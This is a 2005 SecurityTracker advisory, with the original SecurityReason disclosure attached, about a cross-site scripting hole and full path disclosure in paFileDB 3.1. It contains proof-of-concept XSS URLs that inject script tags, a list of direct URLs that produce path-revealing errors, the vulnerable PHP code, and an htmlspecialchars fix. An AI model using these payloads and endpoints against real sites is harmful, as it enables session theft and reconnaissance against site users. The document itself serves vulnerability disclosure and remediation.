SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   paFileDB Vendors:   PHP Arena
paFileDB Input Validation Hole in $pageurl Lets Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1013405
SecurityTracker URL:  http://securitytracker.com/id/1013405
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 9 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 3.1
Description:   sp3x of SecurityReason reported a vulnerability in paFileDB. A remote user can determine the installation path. A remote user can also conduct cross-site scripting attacks.

The '/includes/functions.php' script does not properly validate user-supplied input in the 'pageurl' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the paFileDB software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstratoin exploit URLs are provided:

http://[target]/[pafiledb_dir]/pafiledb.php?"><script>alert();</script>
http://[target]/[pafiledb_dir]/pafiledb.php?action="><script>alert();</script>
http://[target]/[pafiledb_dir]/pafiledb.php?[something]="><script>alert();</script>
http://[target]/[pafiledb_dir]/pafiledb.php?[something]=&[something]="><script>alert();</script>

A remote user can access certain URLs to cause the system to disclose the installation path. Some demonstration exploit URLs are provided:

http://[target]/[pafiledb_dir]/pafiledb.php?str=[something]
http://[target]/[pafiledb_dir]/includes/viewall.php
http://[target]/[pafiledb_dir]/includes/stats.php
http://[target]/[pafiledb_dir]/includes/search.php
http://[target]/[pafiledb_dir]/includes/rate.php
http://[target]/[pafiledb_dir]/includes/main.php
http://[target]/[pafiledb_dir]/includes/license.php
http://[target]/[pafiledb_dir]/includes/category.php
http://[target]/[pafiledb_dir]/includes/download.php
http://[target]/[pafiledb_dir]/includes/file.php
http://[target]/[pafiledb_dir]/includes/email.php
http://[target]/[pafiledb_dir]/includes/admin.php

The vendor has been notified.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the paFileDB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can determine the installation path.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phparena.net/pafiledb.php (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiple vulnerabilities in paFileDB


-=[ SecurityReason-2005-SRA#01 ]=-
 
-=[ Multiple vulnerabilities in paFileDB ]=-
 
Author: sp3x
Date: 8. March 2005
 
Affected software :
===================
paFileDB version : => 3.1
 
Description :
=============
 
paFileDB is designed to allow webmasters have a database of files for download on their site.
To add a download, all you do is upload the file using FTP or whatever method you use, log
into paFileDB's admin center, and fill out a form to add a file. paFileDB lets you edit and
delete the files too.
No more messing with a bunch of HTML pages for a file database on your site!
Using speedy MySQL for storing data, and powerful PHP for processing everything, paFileDB is
one of the best and easiest ways to manage files!
 
Cross-site scripting - XSS :
============================
 
In PaFileDB there are XSS that can  be used to steal cookies and do other operations, which in
normal conditions are not permitted by browser's cross-domain security restrictions.
 
First let's see the vuln code.
/includes/functions.php
 
Code:
-------------------------------------------------------------------------------------------------
function jumpmenu($db, $pageurl,$pafiledb_sql,$str) {
        echo("<form name=\"form1\">
        <select name=\"menu1\" onChange=\"MM_jumpMenu('parent',this,0)\" class=\"forminput\">
        <option value=\"$pageurl\" selected>$str[jump]</option>
        <option value=\"$pageurl\">---------</option>");
.....
--------------------------------------------------------------------------------------------------
 
As we can see the $pageurl variable is vuln for XSS.
 
Examples:
=========
 
XSS:
----
http://[target]/[pafiledb_dir]/pafiledb.php?"><script>alert();</script>
http://[target]/[pafiledb_dir]/pafiledb.php?action="><script>alert();</script>
http://[target]/[pafiledb_dir]/pafiledb.php?[something]="><script>alert();</script>
http://[target]/[pafiledb_dir]/pafiledb.php?[something]=&[something]="><script>alert();</script>
 
and more and more....
So we can enter XSS also in non existing variable.
This XSS is almost on all site because the function jumpmenu is used in pafiledb.php
- line 30 in pafiledb.php - require "./includes/functions.php";
 
Full Path Disclosure :
======================
 
Full path to script must be kept in secret because it can  lead to successful attack on the
website. If the attacker know Full path to script , he can start searching some more info on
others folders or about the server where the site is and  then try to break in.
 
Many scripts can be accessed directly and this will provoke standard
php error messages, which leads to full path disclosure.
 
Examples :
----------
 
http://[target]/[pafiledb_dir]/pafiledb.php?str=[something]
 
Error message :
---------------
=====================================
Fatal error: Cannot use assign-op operators with overloaded objects nor string offsets in
/[patch to site]/public_html/pafiledb/lang/english.php on line 55
=====================================
 
http://[target]/[pafiledb_dir]/includes/viewall.php
 
Error message :
---------------
=====================================
Fatal error: Call to undefined function: locbar() in /patch to
site/public_html/pafiledb/includes/viewall.php on line 16
=====================================
 
http://[target]/[pafiledb_dir]/includes/stats.php
http://[target]/[pafiledb_dir]/includes/search.php
http://[target]/[pafiledb_dir]/includes/rate.php
http://[target]/[pafiledb_dir]/includes/main.php
 
http://[target]/[pafiledb_dir]/includes/license.php
 
Error message :
---------------
=====================================
Fatal error: Call to a member function on a non-object in /patch to
site/public_html/pafiledb/includes/license.php on line 12
=====================================
 
http://[target]/[pafiledb_dir]/includes/category.php
http://[target]/[pafiledb_dir]/includes/download.php
http://[target]/[pafiledb_dir]/includes/file.php
http://[target]/[pafiledb_dir]/includes/email.php
 
http://[target]/[pafiledb_dir]/includes/admin.php
 
Error message :
---------------
=====================================
Warning: main(./includes/admin/login.php): failed to open stream: No such file or directory in
/home/phparena/public_html/demo/pafiledb/includes/admin.php on line 17
 
Warning: main(./includes/admin/login.php): failed to open stream: No such file or directory in
/home/phparena/public_html/demo/pafiledb/includes/admin.php on line 17
 
Warning: main(): Failed opening './includes/admin/login.php' for inclusion
(include_path='.:/usr/lib/php:/usr/local/lib/php') in
/home/phparena/public_html/demo/pafiledb/includes/admin.php on line 17
======================================
 
How to fix :
============
 
XSS :
-----
 
give this in function jumpmenu -> file /includes/functions.php
 
$pageurl=htmlspecialchars($pageurl)
 
Function should look like this :
 
Code :
-------------------------------------------------------------------------------------------------
function jumpmenu($db, $pageurl,$pafiledb_sql,$str) {
        $pageurl=htmlspecialchars($pageurl);   
        echo("<form name=\"form1\">
        <select name=\"menu1\" onChange=\"MM_jumpMenu('parent',this,0)\" class=\"forminput\">
        <option value=\"$pageurl\" selected>$str[jump]</option>
        <option value=\"$pageurl\">---------</option>");
.....
--------------------------------------------------------------------------------------------------
 

Download the new version of the script or update.
 
Vendor :
========
 
No respond
 
Greetz :
========
 
Special greetz : cXIb8O3 (we are starting man :] ), pkw (you now :])
 
Contact :
=========
 
sp3x[at]securityreason[dot].com
www.securityreason.com
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC